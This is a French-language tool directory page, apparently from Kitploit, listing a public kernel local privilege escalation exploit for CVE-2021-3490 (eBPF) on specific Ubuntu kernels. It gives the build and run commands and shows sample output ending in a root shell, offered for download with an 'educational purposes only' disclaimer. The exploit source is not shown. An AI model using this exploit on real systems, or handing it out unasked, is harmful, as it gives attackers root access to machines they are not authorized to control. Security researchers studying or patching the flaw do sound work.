Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Linux_LPE_eBPF_CVE-2021-3490 — Exploitation de privilèges du noyau Linux basée sur eBPF ciblant CVE-2021-3490. Fournit un accès root shell sur les noyaux Ubuntu vulnérables 5.8.0-25 à 5.11.0-16. | Kitploit
Outils/GitHubGitHub/chompie1337/linux_lpe_ebpf_cve-2021-3490
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationApprentissage et ÉducationExploitation de Binaires
GitHubchompie1337/linux_lpe_ebpf_cve-2021-3490

Linux_LPE_eBPF_CVE-2021-3490

Exploitation de privilèges du noyau Linux basée sur eBPF ciblant CVE-2021-3490. Fournit un accès root shell sur les noyaux Ubuntu vulnérables 5.8.0-25 à 5.11.0-16.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
317484il y a 3 ansVérifié par Kitploit

Linux_LPE_eBPF_CVE-2021-3490

Exploit LPE pour CVE-2021-3490. Testé sur Ubuntu 20.04.02 et 20.10 (Groovy Gorilla) avec les noyaux 5.8.0-25.26 à 5.8.0-52.58. et Ubuntu 21.04 (Hirsute Hippo) avec 5.11.0-16.17. La vulnérabilité a été découverte par Manfred Paul @_manfp et corrigée dans ce commit.

auteur: @chompie1337

À des fins éducatives et de recherche uniquement. Utilisation à vos risques et périls.

Utilisation :

Pour compiler sous Ubuntu 20.04.02 et Ubuntu 20.10 (Groovy Gorilla) :

make groovy

Pour compiler sous Ubuntu 21.04 (Hirsute Hippo) :

make hirsute

Pour exécuter :

bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

Remarque : Vous devez quitter proprement le shell root en tapant exit pour effectuer le nettoyage et éviter un kernel panic.

Consultez l'article technique Kernel Pwning with eBPF: a Love Story.

Télécharger l’outil